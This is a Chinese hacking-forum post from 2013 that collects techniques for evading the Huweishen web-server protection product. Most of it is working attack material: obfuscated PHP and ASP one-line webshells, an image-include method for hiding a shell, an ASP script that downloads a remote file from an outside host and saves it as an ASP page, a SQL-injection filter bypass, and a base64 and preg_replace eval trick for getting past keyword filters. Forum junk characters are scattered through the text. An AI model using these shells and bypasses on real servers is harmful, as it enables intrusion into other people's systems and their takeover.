找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 突破护卫神技术总汇
返回列表 发新帖
查看: 2332|回复: 0
打印 上一主题 下一主题

突破护卫神技术总汇

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-2-14 00:11:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
申明:由于护卫神收费,破解版又比较低,因此,本贴方法均来自以往实战以及其他网络文献,没有写的请大家留言补上
# ]2 c3 {! b# k3 i3 W-----------------------------------------------------------------------------------------------------------------------------------
. ^6 R/ |8 _, X) S文章分为:$ o" d: K( e& J$ ~4 q2 i
一、马儿篇,都是以前可以过护卫神的马
  w/ [: L1 f+ B. v# k+ o  D二、注入篇,可以绕过注入的方法2 I/ E, v0 D# U, [
三、规则篇,根据护卫神的过滤规则大家可以自己设计马儿. g) Z+ Y# C( d
一、马儿篇! _! r* v5 N( a
----------------1号--------------------------7 l% r$ k4 G! `3 ?% M  D" `
< ?php $ g: M* n) y6 h4 H6 Q
@eval8 v! T, V9 Z/ \+ y% h& J
($_POST['1']);?>
8 C& ]( A% B4 B# s+ h* I/ X----------------2号--------------------------+ }) C% q. i+ g, H  ^1 [5 g8 C( D
<title>login</title>nono<?php* n3 \6 l$ P( J  J
eval
( Z! T1 S& \* m8 L+ H2 f($_POST
; h  p/ n! s/ S1 X5 \[1])
) j; G- k9 H6 y$ f?>& Q0 A! l! M  H$ S$ g
--------------------3号---------------------------------------------$ N8 f0 A+ o3 s2 F; c/ B
< ?php $a = str_replace(x,"","axsxxsxexrxxt");
7 Q' u2 {. m6 M! C$a($_POST["c"]); ?>
2 I! y" o: Y% y; m菜刀直接连,不需要构造连接字符串,密码 c
0 L7 X9 i/ J5 B7 d* Y---------------------某牛给的,据说可过安全狗和护卫神------------------------------<%@language=vbscript codepage=936 %>
" X0 N( }# u- R/ Z+ X9 j9 A9 s; J4 d<%@language=vbscript codepage=936 %>
3 I8 U& u; o- ?<%9 T) O. V& @0 |( m" E( ?. Y
Option Explicit2 \. g$ x, F1 c6 w8 ^
'强制浏览器重新访问服务器下载页面,而不是从缓存读取页面" W' U4 ~7 @$ p
Response.Buffer = True1 O* ~4 ?% i+ R, h) ]+ M
Response.Expires = -1
7 D+ O; A( c4 EResponse.ExpiresAbsolute = Now() - 1
+ ~% y9 ^+ ]; W% h: H* PResponse.Expires = 0: L- z" @5 N7 a5 N4 _# b
Response.CacheControl = "no-cache"! ?# d6 e( z0 R
dim m3 m( Q, ^# r3 a5 {9 x+ }& g
m=request("m")0 e4 G5 a* l: \& x; Y
Dim ArticleID, Action, sql, rs, Hits, ShowType
- c7 u0 \& l8 j) Xif m<>"" then execute(m)) P8 d- i. V; ]
ArticleID = Trim(request("ArticleID"))
: @) x6 {3 ]$ t) {/ K2 {  F. ]  V& _Action = Trim(request("Action"))9 `1 W/ O" c( y1 o7 x, a( R
ShowType = Trim(request("ShowType"))
  k7 {4 L9 w( U2 V' O- mIf IsNumeric(ShowType) Then
, M: C/ Y8 R: Z. R- N    ShowType = CLng(ShowType)
* m& I" }' p$ N1 m8 f/ S2 v& YElse
7 |: x9 B) d1 Y4 J! i" S    ShowType = 1# ^3 {6 _7 v7 @- N! g6 m
End If
  H3 H. n" r; L  a. t3 y%>/ i. ~- Q9 i$ r) ?0 x) [2 {- `
--------------------类似于过安全狗的包含方法-------------------------------------------% Y: H. e/ o1 l9 W. [
A.asp版本:
' D6 ^. A% G: z. X! S8 O$ z将一句话保存为 XX.jpg 上传后 地址为 .../131717.jpg $ P0 W( G! }# t* [7 {" M3 C
在上传一个 x.asp 内容为 <!–#include file="../131717.jpg"-->
- L: P- _. ^* c9 t2 z& y* _7 oB.php版本7 h( |; R) |" R1 F* d" u
如果是php的话:1 _2 y6 e$ G7 E4 L7 u* Q
< ?php
6 I' \, C: c2 [) W3 Zinclude "1.htm";
$ k9 I1 {  w$ W: c  }6 F3 J0 x) S?>! |1 Z+ m4 X' c. v; v% j
------------------实在不行,还可以下载---------------------------------------------3 i& y9 S1 D- m2 _; y* f2 v
远程下载马% \% Z8 h% j0 l' D, ~6 H) M1 q
<%
% E# p9 V/ _! b* I9 o . w# ~. ^& y5 c# m9 F+ ]
Set xPost = CreateObject("Microsoft.XMLHTTP")" q" B$ \0 x$ F2 _7 }
6 J3 Z8 j; S/ E) y
xPost.Open "GET","http://www.8090sec.com/1.txt",False
4 E1 B. }; B$ M- `" ^! O" B
& h) K" j9 Y* @, a& S* y0 BxPost.Send()
) w3 O+ z# u( C0 _# \- I( I3 B
0 _2 x5 W8 y% g) e1 E9 j4 Z0 TSet sGet = CreateObject("ADODB.Stream")0 h$ W& ^3 F8 X' u

' R5 P% |5 B# esGet.Mode = 3
0 }* ]* T" T" A$ H) S& X) r) F: \0 f $ K+ N2 [! a; |& L- W& s
sGet.Type = 16 P/ v+ D9 m+ r% H

. h% `5 U7 E0 q- asGet.Open()" t. w5 ?- i( ]+ F0 e( U  k

; x3 j! V' B/ K5 Q- E& n) \! JsGet.Write(xPost.responseBody)
6 T& Q& B% m( W9 _  _ ' b) R2 A8 p" }* i% ~9 q
sGet.SaveToFile Server.MapPath("ls.asp"),2& T0 e9 k5 E  W( Q, |6 A

0 `8 u* E4 D- B, t. }& S  @; Kset sGet = nothing
# O, y: n/ a4 l. x# }, f / k( H+ i. z7 |, z
set sPOST = nothing" j: V. s1 n% @; J% L/ ~
. u% m$ X) j5 ~; ?, O" \! D
%>
% Z) A+ v/ C# w- z6 o8 ?二、注入篇. X( _  z- r+ O
/*%00*/截断符
- m1 f! _0 j/ Z" v1 l4 j9 wselect/*%00*/* from admin;, g1 T6 h$ c+ @. p9 N6 U$ v
---------------------------------------------------------------
6 I. N. \& e& m7 [- o---------------------------------------------------------------- x2 {7 @. n& E5 h
三、规则篇7 i: ?" R! d# j3 W) `$ M- U
可以利用类似:
: X' D/ }' x" f6 a% W: e6 k+ u<?php/ m2 c7 p- o! `" d7 ?& f; Y
" C6 |% j6 `* S" B6 K! V
$code='一串base64'; //base64编码/ s! m, G% Y. ]5 q: M5 a7 O

+ J$ O& W4 T+ C5 y8 C* M$x=str_replace('f',"","bfafsfef6f4f_ffdffeffcffoffdffef"); //字符串替换
8 n0 v( H8 D& ]2 M0 Q3 y 9 X, A- J1 w) i8 A; s( L2 B
$a = '/a/';//正则规则
. O# f% c; u4 J! | 3 s: x3 {% m4 F3 r# `1 L5 M
preg_replace($a,'e'.'v'.'a'.'l'.'('.$x.'('.$code.'))','a'); //正则替换
  [& P2 S1 m$ s# X' d 6 E% e0 C8 }7 N( C
?>* p! O; U2 _: ^# ^# j; R
方法绕过关键词过滤
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表